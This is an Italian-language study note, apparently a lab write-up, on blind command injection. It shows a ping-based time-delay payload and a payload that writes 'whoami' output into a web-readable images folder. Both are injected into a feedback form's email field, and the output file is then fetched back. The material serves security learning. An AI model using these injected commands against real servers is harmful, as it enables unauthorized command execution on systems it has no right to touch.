tags: command_injection injection Blind_Command_Injection
Per Blind Command Injection si intende una command injection che non ti permette di vedere la risposta del server, quindi come per le blind sql injection dobbiamo utilizzare il tempo per vedere se effettivamente la nostra query è stata eseguita, ma ci sono anche altre tecniche interessanti.
Delay
#Il seguente payload fa ritardare la richiesta di circa 10 secondi
|| ping -c 10 127.0.0.1||
# Lo puoi inserire per esempio in una richiesta di questo tipo:
csrf=5Y0OYevdgU064ArLo1nOy7AHRcd3HI8q&name=Paninio&email=wiener%40panino || ping -c 10 127.0.0.1||&subject=panino+di+cioccolato&message=abara
Reindirizzamento
Questa tecnica si occupa di reindirizzare la nostra richiesta malevola ad una pagina alla quale abbiamo il permesso di lettura sui file presenti in essa, quindi se per esempio avessimo un parametro vulnerabile alla blind sql injection e una pagina come per esempio /images che contiene tutte le immagini del sito che possiamo vedere potremmo reindirizzare quella richiesta a quella pagina e poi tramite browser vederne il contenuto come nel seguente esempio:
#Questo è il payload:
||whoami >/var/www/images/file.txt||
#Che inseriamo in questo parametro vulnerabile:
csrf=tJkCBKQFAvc68VVXO3ZzqRYDvOCR2fJh&name=Paninio&email=wiener%40panino||whoami >/var/www/images/file.txt||&subject=panino+di+cioccolato&message=baraaae
#Ora tramite Burp catturiamo la pagina che ci permette di vedere il contenuto:
GET /image?filename=file.txt
#Risposta:
peter-csVNDD